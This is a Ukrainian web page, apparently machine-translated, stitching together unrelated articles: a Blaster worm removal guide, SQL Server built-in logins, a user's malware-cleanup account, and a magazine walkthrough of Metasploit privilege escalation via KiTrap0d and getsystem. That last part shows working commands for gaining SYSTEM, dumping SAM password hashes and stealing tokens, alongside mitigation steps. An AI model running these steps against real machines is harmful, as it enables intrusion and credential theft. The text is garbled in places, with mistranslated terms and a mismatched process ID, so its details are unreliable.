• Кращі поради: Як змінити роздільну здатність екрана монітора Чому не встановлюється потрібна роздільна здатність екрана
• Зависла бездротова мишка на комп'ютері
• Автозавантаження програм, що стартують з операційною системою
• Як дізнатися свій номер телефону МТС?
• Найкращі бюджетні смартфони з гарною камерою Огляд недорогих смартфонів з гарною камерою
• Як можна телефоном та планшетом керувати телевізором і які програми потрібні?
• Використання прихованих нотаток у телефонах сяомі
• Samsung Galaxy Ace S5830: характеристики, опис, відгуки Телефон Samsung Асе
• Датчик наближення в телефоні, як включити, відключити, калібрування датчика Як включити датчик наближення на хонор 10
• Як дізнатися баланс іншого абонента «МТС»: всі можливі способи Спеціальний мобільний додаток

NT AUTHORITY/SYSTEM ERROR,
повідомлення XP - як видалити вірус

Якщо у Вас російська версія - перш ніж качати обов'язково змініть мову.

Трохи про сам вірус:

Вчорашнього вечора, приблизно після 23 години по Москві, у багатьох форумах стали з'являтися повідомлення про дивну поведінку Windows 2000 і Windows XP при заході в Мережу: система видала повідомлення про помилку сервісу RPC та необхідність перезавантаження. Після перезавантаження повідомлення повторювалося максимум через кілька хвилин, і не було кінця.

Проведене розслідування показало, що виною всьому епідемія нового мережевого черв'яка, що почалася сьогодні w32.Blaster.worm. , яке викликається відповідним чином складеним TCP/IP пакетом, що прийшов на порт 135, 139 або 445 комп'ютера, що атакується. Вона дозволяє як мінімум провести DoS-атаку (DoS означає "Denial of Service", або "відмова в обслуговуванні", в даному випадку - комп'ютер, що атакується, перезавантажується), а як максимум - виконати в пам'яті атакованого комп'ютера будь-який код.

Перше, що викликало занепокоєння мережевої громадськості ще до появи черв'яка - це наявність дуже простого у використанні експлоїту (програми для використання вразливості), що зазвичай призводить до ситуації, коли будь-хто може взяти цю програму і почати їй користуватися аж ніяк не в мирних цілях. Однак це були квіточки.

Новий черв'як при своєму поширенні проводить атаку на 135-й порт, і, у разі успіху, запускає програму TFTP.exe, за допомогою якої завантажує на свій комп'ютер свій виконуваний файл. При цьому користувачеві видається повідомлення про зупинення сервісу RPC та подальше перезавантаження. Після перезавантаження черв'як автоматично запускається і починає сканувати доступні з комп'ютера мережі на предмет комп'ютерів з відкритим 135 портом. При виявленні таких черв'як проводить атаку, і повторюється спочатку. Причому, судячи з темпів поширення на Наразі, Незабаром черв'як вийде на перше місце в списках антивірусних компаній.

Існують три способи захисту від хробака.

По-перше, у бюлетені Microsoft наведено посилання на патчі для всіх вразливих версій Windows, що закривають пролом в RPC (ці патчі були випущені ще 16 липня, тому тим, хто регулярно оновлює систему, турбуватися не варто).

По-друге, якщо 135-й порт закритий файрволлом - хробак не зможе проникнути на комп'ютер.

По-третє, як крайня міра допомагає відключення DCOM (докладно цю процедуру описано в бюлетені від Microsoft). Таким чином, якщо ви ще не зазнали атаки черв'яка - настійно рекомендується якнайшвидше завантажити патч для вашої ОС з сервера Microsoft (наприклад, скористайтеся службами Windows Update), або налаштувати блокування портів 135, 139 та 445 у файрволлі.

Якщо ваш комп'ютер вже заражений (а поява повідомлення про помилка RPCоднозначно означає, що він заражений), необхідно вимкнути DCOM (інакше кожна наступна атака буде викликати перезавантаження), після чого скачати і встановити патч.

Для знищення черв'яка необхідно видалити з ключа реєстру HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run запис "windows auto update"="msblast.exe", після чого знайти і стерти файл msblast.exe - це тіло черв'яка. Більш детально про процедуру видалення хробака можна прочитати на сайті Symantec.

На даний момент не всі антивіруси виявляють хробака - сподіватися на захист з їхнього боку можна буде лише після виходу оновлень.
Вміщено AHTOH 17-08-2003 о 23:29:

НЕБЕЗПЕЧНИЙ ЧЕРВЬ! Nt Authority / System Error

__________________
Приношу добро, наношу користь...

Вбудовані логіни SQL Server 2005, BUILTIN\Адміністратори, , NT AUTHORITY\SYSTEM, sa

Відразу після установки SQL Server 2005 у контейнері Loginsз'являється набір логінів, що створюються автоматично. Швидше за все, для підключення користувачів ви не використовуватимете їх. Тим не менш, виникають ситуації, в яких знання вбудованих логінів може стати в нагоді (наприклад, якщо буде ненароком заблокований ваш адміністративний логін).

q BUILTIN\Адміністратори (або BUILTIN\Administrators, в залежності від мови операційної системи) - логіну для цієї групи Windows автоматично надаються права системного адміністратора SQL Server. Зверніть увагу, що якщо комп'ютер входить до домену, до цієї групи автоматично потрапляє група DomainAdmins(Адміністратори домену), і, таким чином, адміністратори домену за замовчуванням мають повними правамина SQL Server. Якщо така ситуація небажана, цей логін можна видалити. Але і в цьому випадку адміністраторам домену отримати доступ до даних SQL Server буде неважко.

q Ім'я_сервера 2005MSFTEUser$ Ім'я_сервера$Ім'я_примірника , Ім'я_сервера 2005MSSQLUser$ Ім'я_сервера$Ім'я_примірника ,Ім'я_сервера 2005SQLAgentUser$ Ім'я_сервера$Ім'я_примірника - ці три логіни для груп Windowsвикористовуються для підключення відповідних служб до SQL Server 2005. На рівні SQL Server 2005 з ними немає необхідності виконувати якісь операції, оскільки всі необхідні права вже надано. У поодиноких ситуаціях вам може знадобитися додати до цих груп на рівні Windows облікові записи, від імені яких працюють служби SQL Server .

q NT AUTHORITY\NETWORK SERVICE - від імені цього облікового запису в Windows Server 2003 працюють програми ASP .NET , у тому числі й служби Reporting Services (у Windows 2000 для цієї мети використовується обліковий запис ASPNET). Цей логін Windows використовується для підключення до SQL Server Reporting Services. Йому автоматично надаються необхідні права на бази даних master, msdbта на бази даних, які використовуються Reporting Services .

q NT AUTHORITY\SYSTEM - це локальний системний обліковий запис операційної системи. Такий логін з'являється в тих ситуаціях, коли ви налаштували роботу служби SQL Server від імені локального системного облікового запису. Можна сказати, що за допомогою цього логіну SQL Server звертається до себе. Звичайно ж, цей логін має права системного адміністратора SQL Server .

q sa (від SystemAdministrator)- це єдиний логін типу SQL Server, який створюється за умовчанням. Він має права системного адміністратора SQL Server , і відібрати ці права у нього не можна. Видалити цей логін також не вдасться. Проте його можна перейменувати або вимкнути. Якщо для SQL Server 2005 буде налаштовано автентифікацію тільки засобами Windows, використовувати цей логін для підключення до сервера не вдасться.

Нещодавно, точніше тиждень тому хапнув черв'яка, причому зроду такого не було за все моє чайництво! Час ніч - майстра не викличеш, та й гроші тільки на картці - в кормані рублів 200. Що робити, комп'ютер потрібен до зарізу!

Через телефон лізу в пошукові системи і забиваю написану в заголовку теми назву - мамо моя, що я дізнаюся - це тварина живе в інеті з 1993 року, причому корпорація microsoft знає про неї, творець поінформував їх спеціально. На сьогоднішній день цей черв'як потрапляючи у ваш комп'ютер отримує права адміна і здатний витворяти будь-які фокуси.

Дослідивши кілька десятків форумів, перечитавши за добу сотні порад я не знаючи сну лізу в надра своєї системи і тремтячими руками починаю відкривати папки і файли, про які прочитав. Знову через телефон я лізу до нас на сайт і пишу одному з наших модераторів... Проблема дуже каверзна і щоб не мучити мене людина радить знести систему та встановити нову, але я ніколи самостійно цього не робив! Він розповідає мені телефоном (не шкодуючи грошей на міжміські переговори) як крок за кроком це зробити, а я сиджу і записую. Після цього він чекає на результат, а я сиджу і розумію, що мені дуже шкода накопиченої інформації... і я приймаю рішення, якщо зносити - встигну завжди, а зараз поборюся своїми силами.

У будь-якому разі я знав, що зі мною поряд наші гуру і вони порадять, що зробити і як. Поки що на свій страх і ризик я роблю таке:

1) Банер відключає комп на перезавантаження через 60 секунд - значить треба цей час збільшити і я за порадою одного форумчанина встигаю перевести годинник на рік тому!

2) вже спокійно і не поспішаючи переглядаю весь реєстр та програми через AnvirTaskManager - він єдиний питав про появу нової програмиале я як лох дозволив пропустити.

3) нічого не зрозумівши там, я запускаю повне сканування AVAST, попередньо встановивши в налаштуваннях всі розширення.

через 3,5 години він видав мені 6 заражених файлів – ось вони

win32 malware-gen(2 штуки)

Fakeinst-T (2шт)

Цих шкідників просто видаляю, навіть не намагаючись лікувати.

4) Потім йду в Revo Unystailer і видаляю все, що встановлював за останні кілька днів, разом з AnvirTaskManager і Reg Organizier.

5) Завантажую AVZ і запускаю.

І тут виникає проблема - у мене диск розділений на два С і Н. С сканується нормально і нічого не знаходить, тільки починає сканувати Н весь комп'ютер впадає в ступор. Перезавантажую- банер вже не вискакує і я заспокоююся, інет працює, але не відкривається мозила, йду через гуглхром.

Перевіряю Н в режимі on-line. Чисто! Відкриваю Н, намагаюся виділити папку – знову комп зависає намертво! Після кількох спроб відкрити, сканую ще раз AVASTом і не знайшовши нічого вирішую – копіювати все на С.

Після копіювання на С очищаю весь Н і лізу в копію - все працює!

Годину тому скачав і оновив Мозилу тепер Радію життя. Перевірив все і тепер оновлю доктора W curellt і поставлю на ніч – вже для заспокоєння совісті! Тож майте на увазі дорогі колеги – не все так страшно. Для безпеки ваших комп'ютерів зробіть як зазначено в прикріпленому файлі!

Хай буде здоров'я у наших PCюків!

З повагою до всіх читачів Олексію!

В рамках одного з проектів довелося налаштовувати додаток, який мав виконувати резервне копіюваннябази даних на віддаленому сервері MS SQL у файлове сховище на іншому сервері. Для доступу до віддаленого сховища використовується обліковий запис, під яким працює MS SQL. У нашому випадку MS SQL був запущений під локальним обліковим записом Network Service(NT AUTHORITY\NetworkService). Природно, цей локальний обліковий запис немає ніяких повноважень на віддаленій кулі. Можна було переключити MS SQL на роботу під доменним обліковим записом (або ), проте можна налаштувати віддалений доступдо кулі та під NT AUTHORITY\NetworkService.

Як дозволити доступ до іншого комп'ютера під обліком NetworkService

Якщо потрібно надати доступ кільком комп'ютерам, найпростіше об'єднати їх однією групою і надавати доступ вже групі. Створіть нову групу в AD і додайте до неї облікові записи комп'ютерів, які повинні звертатися до мережного ресурсу з правами Network Service. У властивостях папки надайте необхідні дозволи групі.

А що з іншими локальними обліковцями?

Під час надання доступу до ресурсу через обліковий запис комп'ютера, чи доступний решта локальних облікових записів? Ні – доступ буде можливий лише для облікових записів Systemі Network Service. Всі локальні облікові записи, якими потрібно дозволити доступ до мережного ресурсу, доведеться надавати доступ індивідуально.

Буквально за кілька днів перед здаванням номера до друку Metasploit обзавівся
Новим модулем, про який ми просто не могли не розповісти. Завдяки
нову команду getsystem, на скомпрометованій системі стало можливо перейти
з User Level у ring0, отримавши права NT AUTHORITY\SYSTEM! І це - у будь-яких
версіях вінди.

19 січня 2010 року стала публічною 0-day вразливість, що дозволяє виконати
підвищення привілеїв у будь-якій версії Windows, починаючи від NT 3.1, випущеної ще
1993 року, і закінчуючи новомодною "сімкою". На exploit-db.com хакером Tavis
Ormandy були опубліковані як вихідники сплоїта KiTrap0d, так і скомпільований
бінарник, готовий до застосування. Опробувати оригінальний сплоїт може будь-який
бажаючий. Для цього потрібно лише витягти з архіву vdmexploit.dll та vdmallowed.exe,
якимось чином передати на машину-жертву, і там запустити exe-шник. У
результаті, незалежно від того, під обліковим записом якого користувача виконано
запуск, з'явиться консоль із привілеями системного користувача, тобто NT
AUTHORITY\SYSTEM. Заради перевірки можна запустити сплоіт на своїй машині,
попередньо залогінившись у систему під звичайним користувачем. Після запуску
сплоїта відкриється нове вікно cmd.exe з максимальними привілеями.

Що дає? Уяви ситуацію, що сплоїть пробиває деякий додаток і
отримує шелл на віддаленому комп'ютері. Нехай це буде згуртуватися для Internet
Explorer - у цьому випадку у зломщика на руках буде доступ до системи з правами
того користувача, під обліком якого було запущено браузер. Не сперечаюся, дуже
часто це буде обліковий запис з правами адміністратора (користувач сам винен), але
якщо ні? Ось тут і можна заюзати KiTrap0d, щоб підняти свої привілеї
до NT AUTHORITY\SYSTEM! Мало того, навіть ті користувачі, які входять до групи
адміністратора, не можуть звертатися до деяких ділянок системи, наприклад,
читання хешей паролів користувачів (про це нижче). А NT системний акаунт -
може! При цьому, на момент публікації статті жодного патча з боку
Microsoft, що закриває вразливість, не було випущено.

Операція "Захоплення системи"

Демонструвати в дії оригінальний згуртувати ми не будемо, тому що 25
січня до Metasploit було додано новий скрипт, завдяки якому використовувати
KiTrap0d стало ще зручніше. Варіант, що спочатку потрапив до бази модулів
нестабільний і спрацьовував не завжди, але не минуло й півдня, як усі помилки були
усунуті. Зараз модуль закачується разом з усіма іншими оновленнями,
так що для встановлення достатньо вибрати пункт меню "Metasploit update".
Тепер, маючи доступ до віддаленої системи, можна набрати "run kitrap0d" та навести
згуртує в дію. "Але раз пішла така п'янка, реалізуємо ми для цієї справи
спеціальну команду", - подумали розробники Metasploit. У результаті
вийшла чудова така команда "підвищити привілеї", доступна через
розширення meterpreter - нам вона дуже подобається:).

Отже, ми маємо доступ до віддаленої системи (наочний приклад
експлуатування наведено у статті "Операція "Аврора") і ми знаходимося в консолі
метасплоїту. Подивимося, як у нас справи з правами:

meterpreter > getuid

Ага, звичайний користувач. Можливо, він навіть входить до групи
адміністраторів, але нам це не важливо. Підключаємо модуль, в якому реалізовано
цікава для нас команда getsystem, і перевіримо, чи поринула вона, відобразивши на
екрані довідку:

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem
Примітка, щоб вивести свою привілею, що з місцевої системи.
OPTIONS:

H Help Banner.
-t Технологія використання. (Default to "0").
0: All techniques available
1: Service - Named Pipe Impersonation (In Memory/Admin)
2: Service - Named Pipe Impersonation (Dropper/Admin)
3: Service - Token Duplication (In Memory/Admin)
4: Exploit - KiTrap0D (In Memory/User)

Як видно, сплоїти KiTrap0D реалізує лише частину функціональності команди.
Якщо тобі вдалося відхопити шелл із користувачем, у якого вже є права
адміністратора, то для підняття рівня NT AUTHORITY\SYSTEM можна використовувати
три інші техніки (вибрати потрібну дозволяє ключ -t). Так чи інакше, не вказавши
взагалі ніяких параметрів ми вкажемо метасплоїту, що той може використовувати
будь-який із підходів. У тому числі і KiTrap0D, що підвищить наші привілеї до рівня
"Система", хоч би якими правами ми зараз мали.

meterpreter > getsystem
...got system (via technique 4).

Ага, отримали повідомлення про успішне підвищення привілеїв, причому для атаки
використовувався саме KiTrap0D – мабуть, у нього пріоритет. Чи ми дійсно
піднялися у системі? Перевіримо наш поточний UID (ідентифікатор користувача):

meterpreter > getuid

Є! Усього одна команда в консолі метасплоїта та права NT AUTHORITY\SYSTEM у
нас у кишені. Далі, загалом кажучи, можна все. При цьому нагадаю, жодного
патчу від Microsoft на момент виходу журналу ще не було.

Дампім паролі

Якщо вже на руках є доступ до системного облікового запису, то треба витягти з цього
щось корисне. В арсеналі Metasploit є чудова команда hashdump -
більш просунута версія відомої утиліти pwdump. Більше того, в останній
версії метасплоїту включено перероблений варіант скрипту, який використовує
модернізований принцип вилучення LANMAN/NTLM хешей і доки не детектується
антивірусами. Але сенс не в цьому. Важливо, що для виконання команди hashdump
необхідні права NT AUTHORITY\SYSTEM. Інакше програма видасть помилку
"[-] priv_passwd_get_sam_hashes: Operation failed: 87". Відбувається це тому,
що LANMAN/NTLM-хеші паролів користувачів зберігає у спеціальних гілках реєстру
HKEY_LOCAL_MACHINE\SAM та HKEY_LOCAL_MACHINE\SECURITY, які недоступні навіть
адміністраторам. Їх можна прочитати лише з привілеями системного облікового запису.
Взагалі кажучи, використовувати сплоїть і потім команду hashdump для того, щоб
локально витягти з реєстру хешу, зовсім необов'язково. Але якщо така
можливість їсти, чому б і ні?

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3ed7[...]
[*] Отримавши user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:...
Guest:501:aad3b435b51404eeaad3b435b51404ee:...
HelpAssistant:1000:ce909bd50f46021bf4aa40680422f646:...

Хеші отримані. Залишається згодувати їх якомусь із брутфорсерів, наприклад,
l0phtcrack.

Як повернути привілеї?

Смішна ситуація сталася, коли я спробував повернути права звичайного
користувача назад. Знайдена команда rev2self не спрацьовувала, і я як і раніше
залишався "NT AUTHORITY\SYSTEM": мабуть, вона призначена для роботи з трьома
іншими підходами, реалізованими в getsystem. Виявилося, щоб повернути
привілеї, необхідно "вкрасти" токен процесу, запущеного тим користувачем,
який нам потрібний. Тому відображаємо всі процеси командою ps та вибираємо з них
підходящий:

meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ----
0
4 System x86 NT AUTHORITY\SYSTEM
370 smss.exe x86 NT AUTHORITY\SYSTEM\SystemRoot\System32\smss.exe
...
1558 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
...

Як ми бачимо, explorer.exe запущений якраз під звичайним користувачам
акаунтом і має PID=1560. Тепер, власне, можна і "украсти токен", заюзавши
команду steal_token. Як єдиний параметр їй передається PID
необхідного процесу:

meterpreter > steal_token 1558
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user

Судячи з поля "Server username", операція виконалася успішно.

Як це працює?

Насамкінець варто розповісти про природу вразливості, що призвела до появи
сплоїти. Пролом у захисті виникає з вини помилки в обробнику системного
переривання #GP (який називається nt!KiTrap). Через неї з привілеями ядра
може бути виконаний довільний код. Це відбувається тому, що система
неправильно перевіряє деякі виклики BIOS"а, коли на 32-бітовій x86-платформі
виконується 16-бітна програма. Для експлуатації вразливості сплоїт створює
16-бітний додаток (%windir% \twunk_16.exe), маніпулює з деякими
системними структурами та викликає функцію NtVdmControl(), щоб стартувати
Windows Virtual DOS Machine (aka підсистема NTVDM), що в результаті попередніх
маніпуляцій призводить до виклику обробника системного переривання #GP та
спрацьовування сплоїта. До речі, звідси випливає і єдине обмеження
сплоїта, який спрацьовує лише на 32-бітових системах. У 64-бітних
операційних банально немає емулятора для запуску 16-бітних додатків.

Чому інформація з готовим сплоїтом потрапила до публічний доступ? Про наявність
вразливості автор сплоїта інформував Microsoft ще на початку минулого року і
навіть отримав підтвердження, що його звіт було ухвалено до розгляду. Тільки віз
і нині там. За рік офіційного патчу від компанії не було, і автор вирішив
опублікувати інформацію публічно, сподіваючись, що справа піде швидше. Подивимося,
чи вийде латка до моменту появи журналу у продажу:)?

Як убезпечити себе від сплоїту

Оскільки повноцінного оновлення для вирішення вразливості поки що немає,
доведеться скористатися обхідними шляхами. Найнадійніший варіант -
відключити MSDOS і WOWEXEC підсистеми, що відразу позбавить сплоїт
функціональність, т.к. він більше не зможе викликати функцію NtVdmControl()
для запуску системи NTVDM. У старих версіях Windowsце реалізується через
реєстр, в якому потрібно знайти гілку HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WOW
і додати якийсь символ до її назви. Для сучасних ОС
встановлювати обмеження на запуск 16-бітових додатків треба через
групові політики. Для цього викликаємо GPEDIT.MSC, далі переходимо до розділу
"Конфігурація користувача/Адміністративні шаблони/Компоненти Windows/Сумісність
додатків" та активуємо опцію "Заборона доступу до 16-розрядних
додатків".

WWW

Опис уразливості від автора сплоїта:

http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html

Тимчасове рішення для усунення проблеми від Microsoft:

http://support.microsoft.com/kb/979682

WARNING

Інформація представлена ​​в освітніх цілях. Використання її в
протизаконних цілях може спричинити кримінальну відповідальність.

• Відео уроки Microsoft Word для Початківців від Андрія Сухового
• Поняття та основні види архітектури ЕОМ Архітектура та принципи роботи ЕОМ
• Alcatel one touch pixi first 4024d прошивка
• Інструкція з експлуатації samsung смартфон galaxy j1
• Прошивка lg p705 андроїд 4
• Як вимкнути пін-код на андроїді
• Заводське скидання Sony Xperia XA Dual
• Програма для керування комп'ютерним залом GameClass: Встановлення та налаштування Технічний опис проекту
• Програми для вимикання комп'ютера
• Тестуємо український антивірус Zillya!

• Невідома мережа без доступу до Інтернету?
• Найкращі соціальні мережі Які соцмережі зараз популярні
• Виведення звуку на віндовс 5
• Пошта швеції відстеження поштових відправлень шведська поштова компанія
• У ноутбуці інтернет не працює через нещасні випадки
• Найкраща програма для пакетної обробки фотографій
• Програма для відновлення фотографій з карток пам'яті та інших носіїв
• TreeSize Free Розмір папок
• Панель керування Nvidia: як виправити?
• При включенні ноутбука виходить біос, що робити